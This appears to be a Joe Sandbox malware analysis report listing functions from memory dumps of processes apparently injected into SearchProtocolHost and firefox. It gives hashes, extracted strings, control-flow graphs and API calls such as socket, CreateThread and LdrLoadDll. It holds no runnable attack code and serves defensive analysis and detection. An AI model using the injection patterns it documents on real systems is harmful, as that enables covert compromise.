                                • Instruction ID: 517224a701cebee6e0b48ecbb6bc9cb7ea7af1d954bd292979f1c9dd144b6590
                                • Opcode Fuzzy Hash: bb3691908fe1ba9ff47754a9463860947e2cc0d3b22c0bc9e740cf0158c6f297
                                • Instruction Fuzzy Hash: 23D05E727943053BF604A6E58C43F16328D9B40790F444014FA0CD72C1ED94F50059A5
                                Function 033B2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 7134380bf00d711cffacb12c1d35d2554128f9fdd8e73cbf69cbd7487dd4fc9c
                                • Instruction ID: c5946b792a657c4f3c69004dbfbf91a9b4ce20965f5292e79b1ba1696544ca9a
                                • Opcode Fuzzy Hash: 7134380bf00d711cffacb12c1d35d2554128f9fdd8e73cbf69cbd7487dd4fc9c
                                • Instruction Fuzzy Hash: 0DB09B759115C5C5DA11E7644A487177A1467D0701F19C565D3034681E4739C5D1E275

                                Non-executed Functions

                                Function 032304CE Relevance: .2, Instructions: 153COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000006.00000002.2673808272.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3230000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8a07cf61d9eacc2647422e6266bda4f18af0792edd9baeb95f12ddda4bb06c44
                                • Instruction ID: 951800512155bf5e6eb875ab3278ae030be8a829793a3594faa1bfd2dec0fcc7
                                • Opcode Fuzzy Hash: 8a07cf61d9eacc2647422e6266bda4f18af0792edd9baeb95f12ddda4bb06c44
                                • Instruction Fuzzy Hash: 934105B162CB0E4FD368EF6C90812A6B3E5FF46300F50462DD987C7252EA70E8868784
                                Function 0323DFE9 Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2673808272.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3230000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID:
                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                • API String ID: 0-3558027158
                                • Opcode ID: 4df3b27279b808d67fa7f192eeefe1d5676169e1ef73620beae1aaff734f9a2f
                                • Instruction ID: b419e73cf0749b427048c596f6fee568cc40c9f5bc4d53c135703d9b5fbddfde
                                • Opcode Fuzzy Hash: 4df3b27279b808d67fa7f192eeefe1d5676169e1ef73620beae1aaff734f9a2f
                                • Instruction Fuzzy Hash: 1E9163F04182948AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8949CB85
                                Function 033B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: 2f6a8d171458bb47414f733c351483077d1a37345db3980f2a52a167ac0d33fe
                                • Instruction ID: 1aee15d0f7a2ac866c5e20ab504b39e30a2bb843353c163bab9d1d38126ce7f2
                                • Opcode Fuzzy Hash: 2f6a8d171458bb47414f733c351483077d1a37345db3980f2a52a167ac0d33fe
                                • Instruction Fuzzy Hash: 9C51B9B6E00166BFCB14DB988CD09BFF7BCBB492017148669E5A9D7A81D234DE5087E0
                                Function 033A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                Download Yara Rule
                                Strings
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 033E4742
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033E46FC
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 033E4787
                                • Execute=1, xrefs: 033E4713
                                • ExecuteOptions, xrefs: 033E46A0
                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 033E4725
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 033E4655
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID:
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                • API String ID: 0-484625025
                                • Opcode ID: d19af13553d9877646cd5f172cacfd481b7378401075515d5eb6d7d38f9fd81f
                                • Instruction ID: d1b86b933a70ef59c718718babaecdfdeecd37d6030b71e3f5522cff9b1e7834
                                • Opcode Fuzzy Hash: d19af13553d9877646cd5f172cacfd481b7378401075515d5eb6d7d38f9fd81f
                                • Instruction Fuzzy Hash: 7651D735A007197ADF20EBE9DCC9FFE77B8EB48304F0401A9EA05AB191E771DA458B50
                                Function 033BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-$0$0
                                • API String ID: 1302938615-699404926
                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                • Instruction ID: c0d7c7779ed8f3025d67606e0210404dd4aca7bff7086c040c1188c7fe12c70b
                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                • Instruction Fuzzy Hash: 0681AD74E052499FDF24CE68C8D27EEFBB5AF45310F1C425AEA61A7B90CE3489408B60
                                Function 0339F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                Download Yara Rule
                                Strings
                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033E02E7
                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033E02BD
                                • RTL: Re-Waiting, xrefs: 033E031E
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                • API String ID: 0-2474120054
                                • Opcode ID: d0dcf05fbef4f22931bb7fe45ecc3ec2b8f971deeb5265ede2a54f20f40c07f3
                                • Instruction ID: fbb0ecbe903c9aa1179c52a9d95d1f8700b55d971cba739b692b896bcf5e268f
                                • Opcode Fuzzy Hash: d0dcf05fbef4f22931bb7fe45ecc3ec2b8f971deeb5265ede2a54f20f40c07f3
                                • Instruction Fuzzy Hash: 80E18B34608741DFEB25CF29C8C4B6AB7E4BB84314F180A6AF5A5CB6E1D7B4D944CB42
                                Function 033ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                Download Yara Rule
                                Strings
                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 033E7B7F
                                • RTL: Re-Waiting, xrefs: 033E7BAC
                                • RTL: Resource at %p, xrefs: 033E7B8E
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 0-871070163
                                • Opcode ID: 6f8ac40972aed7d477bb6c7d2daaf07e159b4a17e26b3f197b01b7fbc2e9c460
                                • Instruction ID: 3db50fee364aad8da4b61d6ad46b8de93de517a14ae37ec23d8ed27453bc9639
                                • Opcode Fuzzy Hash: 6f8ac40972aed7d477bb6c7d2daaf07e159b4a17e26b3f197b01b7fbc2e9c460
                                • Instruction Fuzzy Hash: EA41C235701B029FC724DE29DC80B6AF7E9EF88710F180A1DF95A9B680DB71E8058B91
                                Function 033AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                Download Yara Rule
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033E728C
                                Strings
                                • RTL: Re-Waiting, xrefs: 033E72C1
                                • RTL: Resource at %p, xrefs: 033E72A3
                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 033E7294
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 885266447-605551621
                                • Opcode ID: 6be9295b8a71b968d12105a73422b36355c65a45be662b19a7ae6d46ef621325
                                • Instruction ID: 218dda4f4b00e3b2279f298dde519e40bf334830a69394b2c7de294c6be0783a
                                • Opcode Fuzzy Hash: 6be9295b8a71b968d12105a73422b36355c65a45be662b19a7ae6d46ef621325
                                • Instruction Fuzzy Hash: 3441BC35B00716AFDB20DE29CCC1B6AB7A9FB84710F180619F955AB680DB21E8529BD1
                                Function 033B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-
                                • API String ID: 1302938615-2137968064
                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                • Instruction ID: 75b438c5b1ee9222df18ccde6ab3789f5cdb09a53bf1fefaa7931ce568391ac6
                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                • Instruction Fuzzy Hash: AA919170E0021A9BDB24DE69CCC16FEB7B9EFC4760F18461AEA65EBAD0D73489418714
                                Function 03379126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$@
                                • API String ID: 0-1194432280
                                • Opcode ID: 44d09b095610eb82d4fad7dd503c92a8913ff74628fc6d5f269c2eef165ec373
                                • Instruction ID: f596c43ad8243bbc5e5dc3fbb9fd5b3fa24d1f3e5cfba37cb19555c7e3cf0632
                                • Opcode Fuzzy Hash: 44d09b095610eb82d4fad7dd503c92a8913ff74628fc6d5f269c2eef165ec373
                                • Instruction Fuzzy Hash: AC811976D01269DBDB31DF54CC84BEAB6B8AB08710F0445EAE919B7240E7749E85CFA0

                                Execution Graph

                                Execution Coverage:9.6%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:0%
                                Total number of Nodes:7
                                Total number of Limit Nodes:1
                                execution_graph 204 587ccc5 205 587cccc socket 204->205 208 587cd7c 205->208 209 587ce3d 208->209 210 587caff 208->210 211 587cb19 socket 210->211 213 587cd7c 211->213 213->208

                                Callgraph

                                Executed Functions

                                Function 0587CCC5 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 328networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 587ccc5-587cccb 1 587cccc-587ccda 0->1 3 587cd03-587cd07 1->3 4 587ccdb 1->4 6 587cd5d-587cd60 3->6 7 587cd09-587cd24 3->7 4->3 5 587ccdd-587cd01 4->5 5->1 10 587cd63-587cd67 6->10 9 587cd2f-587cd35 7->9 9->6 11 587cd37-587cd5b 9->11 10->10 12 587cd69-587cd76 socket 10->12 11->9 14 587ce13-587ce16 12->14 15 587cd7c-587cd83 12->15 16 587ce40-587ce50 14->16 17 587ce18-587ce31 14->17 18 587cd8e-587cd94 15->18 23 587ce5b 16->23 21 587ce33-587ce34 17->21 22 587ce5d-587ce6c 17->22 19 587cd96-587cdba 18->19 20 587cdbc-587cdc0 18->20 19->18 28 587ce02-587ce10 call 587caff 20->28 29 587cdc2-587cdc9 20->29 25 587ce87 21->25 27 587ce36-587ce3b 21->27 22->25 26 587ce6e-587ce6f 22->26 30 587cec4-587cecd 23->30 31 587ce5c 23->31 33 587ce8f-587ce92 25->33 34 587ce89-587ce8c 25->34 26->23 32 587ce70-587ce85 26->32 36 587cdd0-587cdd1 27->36 37 587ce3d-587ce3e 27->37 28->14 39 587cdd4-587cdda 29->39 40 587cdcb-587cdce 29->40 38 587cece-587cf07 30->38 31->22 32->25 33->31 45 587ce94-587ceab 33->45 34->32 43 587ce8e 34->43 36->39 37->16 51 587cf6b-587cf6c 38->51 52 587cf09-587cf16 38->52 39->28 42 587cddb-587ce00 39->42 40->36 42->40 43->33 46 587cead-587ceb8 45->46 47 587cf1a-587cf21 45->47 46->38 50 587ceba-587cebf 46->50 49 587cf2d-587cf36 47->49 50->30 54 587cf6e-587cf6f 51->54 53 587cf17-587cf19 52->53 53->47 53->49 55 587cf71 54->55 56 587cf6a 54->56 57 587cf73-587cf74 55->57 58 587cf9d 55->58 56->51 59 587cfa7-587cfa8 57->59 60 587cf76-587cf80 57->60 61 587cfa1-587cfa2 58->61 62 587cfa6 59->62 63 587cfaa-587cfac 59->63 60->53 64 587cf83-587cf87 60->64 61->61 65 587cfa4 61->65 62->59 66 587cf60-587cf62 62->66 63->62 67 587cfae-587cfb8 63->67 65->62 68 587cf64-587cf69 66->68 69 587cf8c-587cf98 66->69 70 587cf3d-587cf5f 67->70 71 587cfba-587cfbc 67->71 68->56 73 587cf9c 69->73 70->66 71->54 72 587cfbe-587cfd2 71->72 72->73 74 587cfd4-587cfdb 72->74 73->58 75 587d027-587d033 74->75 76 587cfdd-587cff5 74->76 76->75
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2676422121.0000000005860000.00000040.80000000.00040000.00000000.sdmp, Offset: 05860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_5860000_IGcdoWhymz.jbxd
                                Similarity
                                • API ID: socket
                                • String ID: x;U
                                • API String ID: 98920635-1443787485
                                • Opcode ID: 0308a91202fe700d913f425cd6691dd5b5970b4c492ce70bbac6cbf28f13cc5f
                                • Instruction ID: e2c644ce95c61727039931d31505e3686835cd472c7a7cce5908ec463daa5c27
                                • Opcode Fuzzy Hash: 0308a91202fe700d913f425cd6691dd5b5970b4c492ce70bbac6cbf28f13cc5f
                                • Instruction Fuzzy Hash: EAC1177290825D9FCB1ACF68D490AEDBFB2FF4A314B284199D855DB356D330AD42CB90
                                Function 0587CAFF Relevance: 1.8, APIs: 1, Instructions: 298COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 77 587caff-587cb17 78 587cb8f-587cbb4 77->78 79 587cb19-587cb21 77->79 81 587cbb6 78->81 82 587cb68 78->82 80 587cb5e-587cb60 79->80 80->82 85 587cb71-587cb8b 81->85 86 587cbb8-587cbc7 81->86 83 587cbcc-587cbe9 82->83 84 587cb6a-587cb6f 82->84 88 587cc0f-587cc25 83->88 89 587cbeb-587cbed 83->89 84->85 85->78 86->80 87 587cbc9-587cbcb 86->87 87->83 90 587cc28-587cc36 88->90 91 587cc04-587cc0e 89->91 92 587cbef-587cbf4 89->92 93 587cca9 90->93 94 587cc38-587cc39 90->94 91->88 92->91 97 587ccac-587ccaf 93->97 95 587cc3b-587cc6e 94->95 95->90 96 587cc70-587cc74 95->96 98 587cc76-587cc77 96->98 99 587cc8c-587cca7 96->99 97->95 103 587ccb2-587ccca 97->103 101 587cce0-587cd01 98->101 102 587cc79-587cc81 98->102 99->93 104 587cccc-587ccd2 101->104 102->97 105 587cc83-587cc8a 102->105 103->104 106 587ccd5-587ccda 103->106 104->106 105->99 107 587cd03-587cd07 106->107 108 587ccdb 106->108 110 587cd5d-587cd60 107->110 111 587cd09-587cd24 107->111 108->107 109 587ccdd 108->109 109->101 113 587cd63-587cd67 110->113 112 587cd2f-587cd35 111->112 112->110 114 587cd37-587cd5b 112->114 113->113 115 587cd69-587cd76 socket 113->115 114->112 117 587ce13-587ce16 115->117 118 587cd7c-587cd83 115->118 119 587ce40-587ce50 117->119 120 587ce18-587ce31 117->120 121 587cd8e-587cd94 118->121 126 587ce5b 119->126 124 587ce33-587ce34 120->124 125 587ce5d-587ce6c 120->125 122 587cd96-587cdba 121->122 123 587cdbc-587cdc0 121->123 122->121 131 587ce02-587ce10 call 587caff 123->131 132 587cdc2-587cdc9 123->132 128 587ce87 124->128 130 587ce36-587ce3b 124->130 125->128 129 587ce6e-587ce6f 125->129 133 587cec4-587cecd 126->133 134 587ce5c 126->134 136 587ce8f-587ce92 128->136 137 587ce89-587ce8c 128->137 129->126 135 587ce70-587ce85 129->135 139 587cdd0-587cdd1 130->139 140 587ce3d-587ce3e 130->140 131->117 142 587cdd4-587cdda 132->142 143 587cdcb-587cdce 132->143 141 587cece-587cf07 133->141 134->125 135->128 136->134 148 587ce94-587ceab 136->148 137->135 146 587ce8e 137->146 139->142 140->119 154 587cf6b-587cf6c 141->154 155 587cf09-587cf16 141->155 142->131 145 587cddb-587ce00 142->145 143->139 145->143 146->136 149 587cead-587ceb8 148->149 150 587cf1a-587cf21 148->150 149->141 153 587ceba-587cebf 149->153 152 587cf2d-587cf36 150->152 153->133 157 587cf6e-587cf6f 154->157 156 587cf17-587cf19 155->156 156->150 156->152 158 587cf71 157->158 159 587cf6a 157->159 160 587cf73-587cf74 158->160 161 587cf9d 158->161 159->154 162 587cfa7-587cfa8 160->162 163 587cf76-587cf80 160->163 164 587cfa1-587cfa2 161->164 165 587cfa6 162->165 166 587cfaa-587cfac 162->166 163->156 167 587cf83-587cf87 163->167 164->164 168 587cfa4 164->168 165->162 169 587cf60-587cf62 165->169 166->165 170 587cfae-587cfb8 166->170 168->165 171 587cf64-587cf69 169->171 172 587cf8c-587cf98 169->172 173 587cf3d-587cf5f 170->173 174 587cfba-587cfbc 170->174 171->159 176 587cf9c 172->176 173->169 174->157 175 587cfbe-587cfd2 174->175 175->176 177 587cfd4-587cfdb 175->177 176->161 178 587d027-587d033 177->178 179 587cfdd-587cff5 177->179 179->178
                                Memory Dump Source
                                • Source File: 00000009.00000002.2676422121.0000000005860000.00000040.80000000.00040000.00000000.sdmp, Offset: 05860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_5860000_IGcdoWhymz.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b2798e269155d91610fc7f876ae07e90d17035f3c1c5ab930b5ad472df32187
                                • Instruction ID: 630ee5c9fd6db648b9385e8f26d172bced2cc22b9b43b4749655a1492353da54
                                • Opcode Fuzzy Hash: 4b2798e269155d91610fc7f876ae07e90d17035f3c1c5ab930b5ad472df32187
                                • Instruction Fuzzy Hash: 38B1157190815D9FCB06CF69D890AEDBFF2BF8A314F184199E851AB242C731AD42CB91

                                Execution Graph

                                Execution Coverage:2.2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:0%
                                Total number of Nodes:21
                                Total number of Limit Nodes:2
                                execution_graph 4118 21fb4d78b12 4119 21fb4d78b40 4118->4119 4120 21fb4d78b80 LdrLoadDll 4119->4120 4121 21fb4d78b44 4119->4121 4120->4121 4122 21fb4d6f6c2 4125 21fb4d6f6e4 4122->4125 4123 21fb4d6f77b 4124 21fb4d6f70b SleepEx 4124->4125 4125->4123 4125->4124 4139 21fb4d6e9bf 4141 21fb4d6e9d8 4139->4141 4140 21fb4d6ea6a 4141->4140 4142 21fb4d6eb0a CreateThread 4141->4142 4126 21fb4d6ea8d 4127 21fb4d6ea8e 4126->4127 4128 21fb4d6eb38 4127->4128 4129 21fb4d6eb0a CreateThread 4127->4129 4130 21fb4d6ea4b 4131 21fb4d6ea6a 4130->4131 4132 21fb4d6eaa2 4130->4132 4133 21fb4d6eb38 4132->4133 4134 21fb4d6eb0a CreateThread 4132->4134

                                Executed Functions

                                Function 0000021FB4D6E9BF Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 0000000B.00000002.2108611939.0000021FB4D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000021FB4D00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21fb4d00000_firefox.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15b08d44aa81dbeb14d6fdedd9722e35663d15487368850efe64efac8120c430
                                • Instruction ID: 1cf1ad619940b6f44e7b40522f93a3846fba1023882258717a69435a5241f2ef
                                • Opcode Fuzzy Hash: 15b08d44aa81dbeb14d6fdedd9722e35663d15487368850efe64efac8120c430
                                • Instruction Fuzzy Hash: F031253151C6448FFB84DF68D65A3E1B7D0FBAD318F08017DD45ACB286E73696428745
                                Function 0000021FB4D6F6C2 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 0000000B.00000002.2108611939.0000021FB4D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000021FB4D00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21fb4d00000_firefox.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: dc8142fd8931c1e7f142caca776afbb646ae2a63b35c8960207c056a4b6e3c9b
                                • Instruction ID: 4c8c3b785e53d81a720a00bd2204effc69a5057884904ac343d9046042d1d384
                                • Opcode Fuzzy Hash: dc8142fd8931c1e7f142caca776afbb646ae2a63b35c8960207c056a4b6e3c9b
                                • Instruction Fuzzy Hash: CB21627091CA144FEBD59F28CBA97E972D0EB7C708F44067DE46BC7186CB349B418642
                                Function 0000021FB4D78B12 Relevance: 1.6, APIs: 1, Instructions: 54libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 0000000B.00000002.2108611939.0000021FB4D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000021FB4D00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21fb4d00000_firefox.jbxd
                                Similarity
                                • API ID: Load
                                • String ID:
                                • API String ID: 2234796835-0
                                • Opcode ID: 2f638fcf48c97c81224dc21a86f7322f2f3cc3dceeec21d1b4eb1a5441828f8a
                                • Instruction ID: 9ebe5aee5c93d5fec842d71855efd29685ec95b10d4e4078bc90ab36f0b07ebb
                                • Opcode Fuzzy Hash: 2f638fcf48c97c81224dc21a86f7322f2f3cc3dceeec21d1b4eb1a5441828f8a
                                • Instruction Fuzzy Hash: 2F01B53021CA084BEBA4E724CA9DBE773D4FBBC308F00053DA45FC2190EA35D7448A46
                                Function 0000021FB4D6EA8D Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 0000000B.00000002.2108611939.0000021FB4D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000021FB4D00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21fb4d00000_firefox.jbxd
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: 815eb6b9f470969443edcc2936cc1cd3fe6d9fbd3004cdb6df24038f92ac96fe
                                • Instruction ID: 1b1516ddf3d62920958aaad0ab716806b53d4a5eb51771714f1bc2aa5bc09d3d
                                • Opcode Fuzzy Hash: 815eb6b9f470969443edcc2936cc1cd3fe6d9fbd3004cdb6df24038f92ac96fe
                                • Instruction Fuzzy Hash: 0711C0306186098BFB98EF68C66D7D6B3D0FBAC308F05027DD45ACB2C6DB7986458752